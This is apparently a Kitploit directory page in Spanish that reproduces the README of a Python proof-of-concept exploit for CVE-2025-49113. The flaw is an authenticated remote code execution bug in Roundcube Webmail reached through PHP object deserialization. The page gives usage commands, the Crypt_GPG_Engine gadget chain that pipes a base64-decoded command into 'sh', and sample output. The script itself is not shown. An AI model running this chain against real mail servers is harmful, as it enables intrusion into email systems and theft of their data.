Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-49113 — 💥 Exploit en Python para CVE-2025-49113 | RCE en Roundcube Webmail mediante inyección de objetos PHP | Kitploit
Herramientas/GitHubGitHub/00xcanelo/cve-2025-49113
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de Payloads
GitHub00xcanelo/cve-2025-49113

CVE-2025-49113

💥 Exploit en Python para CVE-2025-49113 | RCE en Roundcube Webmail mediante inyección de objetos PHP

Ver Repositorio
86hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-49113 – Exploit RCE de Roundcube Webmail (PoC en Python)

ID de CVE: CVE-2025-49113
Tipo de Exploit: Ejecución Remota de Código (mediante Inyección de Objetos PHP)
Aplicación: Roundcube Webmail ≤ 1.5.9 y ≤ 1.6.10
Lenguaje del Exploit: Python
Autor: 00xCanelo
Estado: Probado y Funcionando en Instalaciones Vulnerables de Roundcube


📌 Descripción

Este exploit aprovecha una vulnerabilidad en la forma en que Roundcube Webmail maneja los nombres de archivos de imágenes subidos, los cuales se deserializan como objetos PHP. Al crear un payload malicioso que activa una cadena de deserialización Crypt_GPG_Engine, se puede lograr la ejecución remota de comandos post-autenticación.

Este PoC en Python imita la cadena de ataque utilizada por el exploit público en PHP, pero con una lógica más limpia, registro opcional y facilidad de uso en configuraciones de herramientas ofensivas.


🚧 Requisitos previos

  • Versión vulnerable de Roundcube (≤1.5.9 o ≤1.6.10)
  • Credenciales de usuario válidas en Roundcube
  • Entorno Python 3.x
  • pip install requests

🚀 Pasos de explotación

root@kitploit:~
python3 CVE-2025-49113.py <target_url> <username> <password> <command>

Ejemplo:

root@kitploit:~
python3 CVE-2025-49113.py https://mail.target.htb/ [email protected] 'P@ssw0rd123' 'id'

🔐 Cadena vulnerable

La clase PHP Crypt_GPG_Engine permite establecer un campo _gpgconf, que luego se pasa a la ejecución del shell. Nuestro payload construye:

root@kitploit:~
echo "<base64-encoded-cmd>" | base64 -d | sh

en _gpgconf, lo que conduce a RCE tras la deserialización.


💣 Salida de ejemplo

root@kitploit:~
[*] Starting CVE-2025-49113 exploit...
[*] Checking Roundcube version...
[*] Detected Roundcube version: 10606
[+] Target is vulnerable!
[*] Logging in...
[+] Login successful.
[*] Uploading serialized gadget as image filename...
[+] Gadget uploaded successfully!

📁 Estructura de archivos

root@kitploit:~
.
├── CVE-2025-49113.py     # Script PoC en Python
└── README.md             # Esta documentación

⚠️ Descargo de responsabilidad

Este código es únicamente para fines de pruebas de seguridad educativas y autorizadas. Cualquier uso indebido de esta herramienta está estrictamente prohibido. El autor no se responsabiliza por ningún daño causado.


🧠 Referencias

  • https://nvd.nist.gov/vuln/detail/CVE-2025-49113
  • https://github.com/roundcube/roundcubemail/issues/9312
  • https://huntr.dev/bounties/f8e2a8e6-d1d7-44e1-93e1-367861c97a82/
Descargar herramienta